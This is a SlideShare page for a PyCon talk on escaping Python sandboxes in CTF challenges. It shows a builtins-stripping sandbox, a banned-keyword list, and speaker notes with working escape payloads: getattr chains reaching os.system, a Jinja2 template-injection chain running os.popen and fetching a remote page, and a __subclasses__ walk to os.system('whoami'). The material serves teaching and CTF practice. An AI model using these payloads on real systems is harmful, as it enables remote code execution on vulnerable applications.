PPTX, PDF3,473 views

Escaping the python sandbox

The document appears to be a code snippet related to Python security, focusing on banning certain built-in functions and imports. It includes several links to resources, potentially for further research on sandboxing in Python and challenges related to capturing the flag (CTF). Overall, it highlights security considerations in coding practices.

Software◦

$
•
•
•
•
• @realgam3
• https://linkedin.com/in/realgam3
• https://github.com/realgam3

from __future__ import print_function
targets = __builtins__.__dict__.keys()
targets.remove('raw_input')
targets.remove('print')
for x in targets:
del __builtins__.__dict__[x]

banned = [
"import",
"exec",
"eval",
"pickle",
"os",
"subprocess",
"kevin sucks",
"input",
"banned",
"cry sum more",
"sys"
]

https://Links
• http://pyconil2018.realgame.co.il
• https://www.digitalwhisper.co.il/files/Zines/0x5A/DW90-
5-PySandbox.pdf
• https://github.com/vstinner/pysandbox
• https://nvisium.com/blog/2016/03/09/exploring-ssti-in-
flask-jinja2.html

More Related Content

PDF

Windows 10 Nt Heap Exploitation (English version)

byAngel Boy

PDF

Linux Kernel - Virtual File System

byAdrian Huang

PPT

Reliable Windows Heap Exploits

byamiable_indian

PDF

Linux SMEP bypass techniques

byVitaly Nikolenko

PPTX

Attacking thru HTTP Host header

bySergey Belov

PPTX

Linux Kernel Booting Process (2) - For NLKB

byshimosawa

PDF

The TCP/IP stack in the FreeBSD kernel COSCUP 2014

byKevin Lo

PDF

The Microkernel Mach Under NeXTSTEP

byGregor Schmidt

Windows 10 Nt Heap Exploitation (English version)

byAngel Boy

Linux Kernel - Virtual File System

byAdrian Huang

Reliable Windows Heap Exploits

byamiable_indian

Linux SMEP bypass techniques

byVitaly Nikolenko

Attacking thru HTTP Host header

bySergey Belov

Linux Kernel Booting Process (2) - For NLKB

byshimosawa

The TCP/IP stack in the FreeBSD kernel COSCUP 2014

byKevin Lo

The Microkernel Mach Under NeXTSTEP

byGregor Schmidt

What's hot

PPTX

Summary of linux kernel security protections

byShubham Dubey

PDF

Introduction to Return-Oriented Exploitation on ARM64 - Billy Ellis

byBillyEllis3

PPTX

Hacking_SharePoint_FINAL

byIan Naumenko, CISSP, CRISC

PDF

Arduino應用系統設計 - Arduino程式快速入門

by吳錫修 (ShyiShiou Wu)

PDF

HTTP Request Smuggling via higher HTTP versions

byneexemil

PDF

Vmlinux: anatomy of bzimage and how x86 64 processor is booted

byAdrian Huang

PDF

Lateral Movement: How attackers quietly traverse your Network

byEC-Council

PDF

Py jail talk

byUTD Computer Security Group

PDF

Linux binary Exploitation - Basic knowledge

byAngel Boy

PDF

Pwning in c++ (basic)

byAngel Boy

PDF

Play with FILE Structure - Yet Another Binary Exploit Technique

byAngel Boy

PPTX

Browser forensics

byPrince Boonlia

PDF

謎の言語Forthが謎なので実装した

byt-sin

PDF

Decompressed vmlinux: linux kernel initialization from page table configurati...

byAdrian Huang

PDF

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto

byPichaya Morimoto

PDF

Physical Memory Management.pdf

byAdrian Huang

PDF

Offzone | Another waf bypass

byДмитрий Бумов

PDF

Linux Binary Exploitation - Return-oritend Programing

byAngel Boy

PPTX

The TCP/IP Stack in the Linux Kernel

byDivye Kapoor

PDF

DeathNote of Microsoft Windows Kernel

byPeter Hlavaty

Summary of linux kernel security protections

byShubham Dubey

Introduction to Return-Oriented Exploitation on ARM64 - Billy Ellis

byBillyEllis3

Hacking_SharePoint_FINAL

byIan Naumenko, CISSP, CRISC

Arduino應用系統設計 - Arduino程式快速入門

by吳錫修 (ShyiShiou Wu)

HTTP Request Smuggling via higher HTTP versions

byneexemil

Vmlinux: anatomy of bzimage and how x86 64 processor is booted

byAdrian Huang

Lateral Movement: How attackers quietly traverse your Network

byEC-Council

Py jail talk

byUTD Computer Security Group

Linux binary Exploitation - Basic knowledge

byAngel Boy

Pwning in c++ (basic)

byAngel Boy

Play with FILE Structure - Yet Another Binary Exploit Technique

byAngel Boy

Browser forensics

byPrince Boonlia

謎の言語Forthが謎なので実装した

byt-sin

Decompressed vmlinux: linux kernel initialization from page table configurati...

byAdrian Huang

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto

byPichaya Morimoto

Physical Memory Management.pdf

byAdrian Huang

Offzone | Another waf bypass

byДмитрий Бумов

Linux Binary Exploitation - Return-oritend Programing

byAngel Boy

The TCP/IP Stack in the Linux Kernel

byDivye Kapoor

DeathNote of Microsoft Windows Kernel

byPeter Hlavaty

More from Tomer Zait

PPTX

The evolution of credential hijacking

byTomer Zait

PPTX

PyMultiTor

byTomer Zait

PDF

PyMultitor

byTomer Zait

PDF

Hacking 101 for developers

byTomer Zait

PPTX

Buffer overflow – Smashing The Stack

byTomer Zait

PPTX

Java - abstract class methods

byTomer Zait

The evolution of credential hijacking

byTomer Zait

PyMultiTor

byTomer Zait

PyMultitor

byTomer Zait

Hacking 101 for developers

byTomer Zait

Buffer overflow – Smashing The Stack

byTomer Zait

Java - abstract class methods

byTomer Zait

Recently uploaded

PDF

Routing Guidelines: Unlocking Smarter Query Routing in MySQL Architectures

byMiguel Araújo

PDF

Prompt Engineering vs Content Engineering vs RAG.pdf

byVineet Sharma

PPTX

Pitch Deck for MEVIA OS - No Apps, Infinite, Decentralized Operating System

byDr. Edwin Hernandez

PDF

Mastering Zero-Allocation Parsers: A Deep Dive into High-Performance C#

byVineet Sharma

PDF

Lost Android Phone Recovery_ Steps That Work Fast.pdf

byIsabella Reed

PPTX

Chapter Two Logic and Language - Copy.pptx

byGediyonBelay

PDF

Introduction to Modern Artificial Intelligence.pdf

byAI n Dot Net

PPTX

Data Skills for Business Analysts: What You Need to Succeed

byScott W. Ambler

PDF

Jira, Powered by Enterprise-Grade Intelligence from NeoroTalks.pdf

byNeoro Talks

PPTX

Best Digital Marketing Company in Lucknow

bydigitallearning9277

PPTX

Installing Python in Visual Studio Code

bydabydcatahanibmcom

PDF

Langchain4J – An Introduction for Impatient Developers

byJuarez Junior

PDF

eresource Xcel ERP for Maunfacturing - Best Manufacturing ERP for SME

byeresource Infotech Pvt.Ltd

PPTX

Connecting to MCP Servers in OutSystems Platform

byOzanCali

PPTX

Prime Teams – Real-Time Employee Monitoring & Project Management Software

byPrime Teams

PDF

Building Smarter AI: 16 RAG Approaches for Accuracy, Memory, and Reasoning Vi...

byVineet Sharma

PDF

JFokus 2026 - Please pass the salt- Serve up passwords with a side of entropy...

byOrtus Solutions, Corp

PDF

Ontwikkel sneller en veiliger met GitHub Copilot

byDelta-N

PDF

Doctor On Call App Development for Digital Healthcare.

byV3CUBE TECHNOLABS

PDF

MySQL Routing Guidelines: Designing Smarter Query Routing Together

byMiguel Araújo

Routing Guidelines: Unlocking Smarter Query Routing in MySQL Architectures

byMiguel Araújo

Prompt Engineering vs Content Engineering vs RAG.pdf

byVineet Sharma

Pitch Deck for MEVIA OS - No Apps, Infinite, Decentralized Operating System

byDr. Edwin Hernandez

Mastering Zero-Allocation Parsers: A Deep Dive into High-Performance C#

byVineet Sharma

Lost Android Phone Recovery_ Steps That Work Fast.pdf

byIsabella Reed

Chapter Two Logic and Language - Copy.pptx

byGediyonBelay

Introduction to Modern Artificial Intelligence.pdf

byAI n Dot Net

Data Skills for Business Analysts: What You Need to Succeed

byScott W. Ambler

Jira, Powered by Enterprise-Grade Intelligence from NeoroTalks.pdf

byNeoro Talks

Best Digital Marketing Company in Lucknow

bydigitallearning9277

Installing Python in Visual Studio Code

bydabydcatahanibmcom

Langchain4J – An Introduction for Impatient Developers

byJuarez Junior

eresource Xcel ERP for Maunfacturing - Best Manufacturing ERP for SME

byeresource Infotech Pvt.Ltd

Connecting to MCP Servers in OutSystems Platform

byOzanCali

Prime Teams – Real-Time Employee Monitoring & Project Management Software

byPrime Teams

Building Smarter AI: 16 RAG Approaches for Accuracy, Memory, and Reasoning Vi...

byVineet Sharma

JFokus 2026 - Please pass the salt- Serve up passwords with a side of entropy...

byOrtus Solutions, Corp

Ontwikkel sneller en veiliger met GitHub Copilot

byDelta-N

Doctor On Call App Development for Digital Healthcare.

byV3CUBE TECHNOLABS

MySQL Routing Guidelines: Designing Smarter Query Routing Together

byMiguel Araújo

Escaping the python sandbox

2.
$ • • • • • @realgam3 • https://linkedin.com/in/realgam3 •https://github.com/realgam3
11.
Objects
24.
from __future__ importprint_function targets = __builtins__.__dict__.keys() targets.remove('raw_input') targets.remove('print') for x in targets: del __builtins__.__dict__[x]
25.
banned = [ "import", "exec", "eval", "pickle", "os", "subprocess", "kevinsucks", "input", "banned", "cry sum more", "sys" ]
27.
https://Links • http://pyconil2018.realgame.co.il • https://www.digitalwhisper.co.il/files/Zines/0x5A/DW90- 5-PySandbox.pdf •https://github.com/vstinner/pysandbox • https://nvisium.com/blog/2016/03/09/exploring-ssti-in- flask-jinja2.html
28.
If You ReallyLike CTF Challenges

Editor's Notes

#3 My name is Tomer Zait and I'm a security researcher on F5 Networks. I’m practical software engineer and offensive security expert. I Love CTF'S and writing open source software's. By The Way Your are welcome to contribute code, or follow me in twitter or github.
#21 Secure Pyshell: print('') print("") print(".") print(open) print(__file__) print(open(__file__)) print(getattr(open(__file__),"read")) print(getattr(open(__file__),"read")()) print(__builtins__) print(dir(__builtins__)) print(getattr(__builtins__,"vars")) print(getattr(__builtins__,"va"+"rs")) print(getattr(__builtins__,"va"+"rs")()) print(getattr(__builtins__,"va"+"rs")()) print(getattr(__builtins__,"va"+"rs")()["os"]) print(getattr(getattr(__builtins__,"va"+"rs")()["os"],"system")) print(getattr(getattr(__builtins__,"va"+"rs")()["os"],"system")("ls"))
#23 Zumbo 3: {{1+1}} {{request.environ}} {{config}} {%set a = 1+2%}{{a}} {{config.__class__.__init__.__globals__}} {{config.__class__.__init__.__globals__['os'].popen('ls').read()}} {{[].__class__.__base__.__subclasses__()}} {{[].__class__.__base__.__subclasses__()[351]}} {%25set c=[].__class__.__base__.__subclasses__()[351]('realgame.co.il',80)%25}{%25set r=c.request('GET', '/pysandbox.html')%25}{{c.getresponse().read()}} http://urllib3.readthedocs.io/en/latest/reference/#urllib3.connectionpool.HTTPConnectionPool https://stackoverflow.com/questions/20646822/how-to-serve-static-files-in-flask
#27 print("".__class__.__mro__) print("".__class__.__mro__[-1].__subclasses__()) print([t.__name__ for t in "".__class__.__mro__[-1].__subclasses__()].index('WarningMessage')) print("".__class__.__mro__[-1].__subclasses__()[59].__init__) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"]) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['os']) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's']) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'].__dict__['s%stem' % 'ys']) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'].__dict__['s%stem' % 'ys'])('whoami')
#30 Ask “What are the actual alternatives that omer simpson has”?